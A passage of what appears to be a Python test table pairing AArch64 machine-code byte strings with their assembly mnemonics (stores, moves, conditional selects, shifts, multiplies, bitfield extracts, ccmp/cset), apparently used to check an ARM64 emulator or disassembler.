("\x25\x00\x00\xf8", "stur x5, [x1]"),
("\x26\x00\x00\x38", "sturb w6, [x1]"),
("\x27\x00\x00\x78", "sturh w7, [x1]"),
("\x29\x00\x00\xf9", "str x9, [x1]"),
("\x2a\x00\x00\x39", "strb w10, [x1]"),
("\x2b\x00\x00\x79", "strh w11, [x1]"),
("\x01\x06\xa0\xd2", "movz x1, #0x30, lsl #16"), # HEAP address
("\xe5\x24\x81\xd2", "movz x5, #2343"),
("\xa6\xaf\x81\xd2", "movz x6, #3453"),
("\x87\x3a\x82\xd2", "movz x7, #4564"),
("\xe8\x16\x84\xd2", "movz x8, #8375"),
("\xe9\xc1\x84\xd2", "movz x9, #9743"),
("\xea\xaa\x82\xd2", "movz x10, #5463"),
("\x25\x18\x00\xa9", "stp x5, x6, [x1]"),
("\x27\x20\x80\xa8", "stp x7, x8, [x1], #0"),
("\x29\xa8\x80\xa8", "stp x9, x10, [x1], #8"),
("\x25\x20\x82\xa9", "stp x5, x8, [x1, #32]!"),
("\x26\x1c\x01\xa9", "stp x6, x7, [x1, #16]"),
("\x25\x18\x00\x29", "stp w5, w6, [x1]"),
("\x27\x20\x80\x28", "stp w7, w8, [x1], #0"),
("\x29\x28\x81\x28", "stp w9, w10, [x1], #8"),
("\x25\x20\x84\x29", "stp w5, w8, [x1, #32]!"),
("\x26\x1c\x02\x29", "stp w6, w7, [x1, #16]"),
("\xc1\xbd\x9b\xd2", "movz x1, #0xddee"),
("\x20\x1c\x40\x93", "sxtb x0, x1"),
("\x20\x3c\x40\x93", "sxth x0, x1"),
("\x20\x7c\x40\x93", "sxtw x0, x1"),
("\x20\x1c\x00\x53", "uxtb w0, w1"),
("\x20\x3c\x00\x53", "uxth w0, w1"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x20\x00\x82\x9a", "csel x0, x1, x2, eq"),
("\x40\x00\x81\x9a", "csel x0, x2, x1, eq"),
("\x20\x10\x82\x9a", "csel x0, x1, x2, ne"),
("\x40\x10\x81\x9a", "csel x0, x2, x1, ne"),
("\x20\x04\x82\x9a", "csinc x0, x1, x2, eq"),
("\x40\x04\x81\x9a", "csinc x0, x2, x1, eq"),
("\x20\x14\x82\x9a", "csinc x0, x1, x2, ne"),
("\x40\x14\x81\x9a", "csinc x0, x2, x1, ne"),
("\x20\x04\x82\xda", "csneg x0, x1, x2, eq"),
("\x40\x04\x81\xda", "csneg x0, x2, x1, eq"),
("\x20\x14\x82\xda", "csneg x0, x1, x2, ne"),
("\x40\x14\x81\xda", "csneg x0, x2, x1, ne"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\x20\xf8\x7f\xd3", "lsl x0, x1, #1"),
("\x20\xf4\x7e\xd3", "lsl x0, x1, #2"),
("\x20\xf0\x7d\xd3", "lsl x0, x1, #3"),
("\x20\xec\x7c\xd3", "lsl x0, x1, #4"),
("\x20\xfc\x41\xd3", "lsr x0, x1, #1"),
("\x20\xfc\x42\xd3", "lsr x0, x1, #2"),
("\x20\xfc\x43\xd3", "lsr x0, x1, #3"),
("\x20\xfc\x44\xd3", "lsr x0, x1, #4"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x20\x20\xc2\x9a", "lsl x0, x1, x2"),
("\x20\x24\xc2\x9a", "lsr x0, x1, x2"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x3f\x00\x02\xeb", "cmp x1, x2"),
("\x5f\x00\x01\xeb", "cmp x2, x1"),
("\x01\x00\x80\xd2", "movz x1, #0"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x3f\x00\x02\xeb", "cmp x1, x2"),
("\x5f\x00\x01\xeb", "cmp x2, x1"),
("\x01\x00\x80\xd2", "movz x1, #0"),
("\x02\x00\x80\xd2", "movz x2, #0"),
("\x3f\x00\x02\xeb", "cmp x1, x2"),
("\x5f\x00\x01\xeb", "cmp x2, x1"),
("\xc1\x88\x83\xd2", "movz x1, #7238"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x3f\x00\x02\xeb", "cmp x1, x2"),
("\x5f\x00\x01\xeb", "cmp x2, x1"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x3f\x00\x02\xab", "cmn x1, x2"),
("\x5f\x00\x01\xab", "cmn x2, x1"),
("\x01\x00\x80\xd2", "movz x1, #0"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x3f\x00\x02\xab", "cmn x1, x2"),
("\x5f\x00\x01\xab", "cmn x2, x1"),
("\x01\x00\x80\xd2", "movz x1, #0"),
("\x02\x00\x80\xd2", "movz x2, #0"),
("\x3f\x00\x02\xab", "cmn x1, x2"),
("\x5f\x00\x01\xab", "cmn x2, x1"),
("\xc1\x88\x83\xd2", "movz x1, #7238"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x3f\x00\x02\xab", "cmn x1, x2"),
("\x5f\x00\x01\xab", "cmn x2, x1"),
("\x41\x9a\x80\xd2", "movz x1, #1234"),
("\xc2\x88\x83\xd2", "movz x2, #7238"),
("\x63\xa0\x84\xd2", "movz x3, #9475"),
("\x20\x0c\xa2\x9b", "umaddl x0, w1, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x00\x0c\xa2\x9b", "umaddl x0, w0, w2, x3"),
("\x20\x8c\xa2\x9b", "umsubl x0, w1, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\xc1\xfd\xbf\xd2", "movz x1, #0xffee, lsl #16"),
("\x42\xd5\xbd\xd2", "movz x2, #0xeeaa, lsl #16"),
("\xa3\xd5\x9b\xd2", "movz x3, #0xdead"),
("\x20\x0c\x22\x9b", "smaddl x0, w1, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\xc1\xfd\xbf\xd2", "movz x1, #0xffee, lsl #16"),
("\x42\xd5\xbd\xd2", "movz x2, #0xeeaa, lsl #16"),
("\xa3\xd5\x9b\xd2", "movz x3, #0xdead"),
("\x20\x8c\x22\x9b", "smsubl x0, w1, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\xc1\xfd\xbf\xd2", "movz x1, #0xffee, lsl #16"),
("\x42\xd5\xbd\xd2", "movz x2, #0xeeaa, lsl #16"),
("\x20\x7c\x22\x9b", "smull x0, w1, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\xc1\xfd\xbf\xd2", "movz x1, #0xffee, lsl #16"),
("\x42\xd5\xbd\xd2", "movz x2, #0xeeaa, lsl #16"),
("\x20\x7c\x42\x9b", "smulh x0, x1, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x01\x06\xa0\x92", "movn x1, #0x30, lsl #16"),
("\x02\x02\x80\x92", "movn x2, #16"),
("\x63\xa0\x84\x92", "movn x3, #9475"),
("\x64\xa0\x84\x92", "movn x4, #9475"),
("\xe5\x24\x81\x92", "movn x5, #2343"),
("\xa6\xaf\x81\x92", "movn x6, #3453"),
("\x87\x3a\x82\x92", "movn x7, #4564"),
("\xe8\x16\x84\x92", "movn x8, #8375"),
("\xe9\xc1\x84\x92", "movn x9, #9743"),
("\xea\xaa\x82\x92", "movn x10, #5463"),
("\x2b\xf8\x80\x92", "movn x11, #1985"),
("\xc1\xfd\xff\xd2", "movz x1, #0xffee, lsl #48"),
("\x81\xb9\xdb\xf2", "movk x1, #0xddcc, lsl #32"),
("\x41\x75\xb7\xf2", "movk x1, #0xbbaa, lsl #16"),
("\x01\x31\x93\xf2", "movk x1, #0x9988"),
("\x20\x00\x40\xd3", "ubfx x0, x1, #0, #1"),
("\x20\x08\x40\xd3", "ubfx x0, x1, #0, #3"),
("\x20\x0c\x40\xd3", "ubfx x0, x1, #0, #4"),
("\x20\x10\x40\xd3", "ubfx x0, x1, #0, #5"),
("\x20\x78\x40\xd3", "ubfx x0, x1, #0, #31"),
("\x20\xf8\x40\xd3", "ubfx x0, x1, #0, #63"),
("\x20\xfc\x40\xd3", "ubfx x0, x1, #0, #64"),
("\x20\xfc\x41\xd3", "ubfx x0, x1, #1, #63"),
("\x20\xfc\x42\xd3", "ubfx x0, x1, #2, #62"),
("\x20\xfc\x43\xd3", "ubfx x0, x1, #3, #61"),
("\x20\xfc\x60\xd3", "ubfx x0, x1, #32, #32"),
("\x20\x4c\x4a\xd3", "ubfx x0, x1, #10, #10"),
("\xc1\xfd\xff\xd2", "movz x1, #0xffee, lsl #48"),
("\x81\xb9\xdb\xf2", "movk x1, #0xddcc, lsl #32"),
("\x41\x75\xb7\xf2", "movk x1, #0xbbaa, lsl #16"),
("\x01\x31\x93\xf2", "movk x1, #0x9988"),
("\x20\x00\x40\x93", "sbfx x0, x1, #0, #1"),
("\x20\x08\x40\x93", "sbfx x0, x1, #0, #3"),
("\x20\x0c\x40\x93", "sbfx x0, x1, #0, #4"),
("\x20\x10\x40\x93", "sbfx x0, x1, #0, #5"),
("\x20\x78\x40\x93", "sbfx x0, x1, #0, #31"),
("\x20\xf8\x40\x93", "sbfx x0, x1, #0, #63"),
("\x20\xfc\x40\x93", "sbfx x0, x1, #0, #64"),
("\x20\xfc\x41\x93", "sbfx x0, x1, #1, #63"),
("\x20\xfc\x42\x93", "sbfx x0, x1, #2, #62"),
("\x20\xfc\x43\x93", "sbfx x0, x1, #3, #61"),
("\x20\xfc\x60\x93", "sbfx x0, x1, #32, #32"),
("\x20\x4c\x4a\x93", "sbfx x0, x1, #10, #10"),
("\x20\x48\x49\x93", "sbfx x0, x1, #9, #10"),
("\x20\x40\x47\x93", "sbfx x0, x1, #7, #10"),
("\x20\x3c\x47\x93", "sbfx x0, x1, #7, #9"),
("\xc1\xfd\xbf\xd2", "movz x1, #0xffee, lsl #16"),
("\x42\xd5\xbd\xd2", "movz x2, #0xeeaa, lsl #16"),
("\x20\x00\x42\xfa", "ccmp x1, x2, 0, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x21\x00\x42\xfa", "ccmp x1, x2, 1, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x22\x00\x42\xfa", "ccmp x1, x2, 2, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x23\x00\x42\xfa", "ccmp x1, x2, 3, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x24\x00\x42\xfa", "ccmp x1, x2, 4, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x25\x00\x42\xfa", "ccmp x1, x2, 5, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x26\x00\x42\xfa", "ccmp x1, x2, 6, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x27\x00\x42\xfa", "ccmp x1, x2, 7, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x28\x00\x42\xfa", "ccmp x1, x2, 8, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x29\x00\x42\xfa", "ccmp x1, x2, 9, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2a\x00\x42\xfa", "ccmp x1, x2, 10, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2b\x00\x42\xfa", "ccmp x1, x2, 11, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2c\x00\x42\xfa", "ccmp x1, x2, 12, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2d\x00\x42\xfa", "ccmp x1, x2, 13, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2e\x00\x42\xfa", "ccmp x1, x2, 14, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2f\x00\x42\xfa", "ccmp x1, x2, 15, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
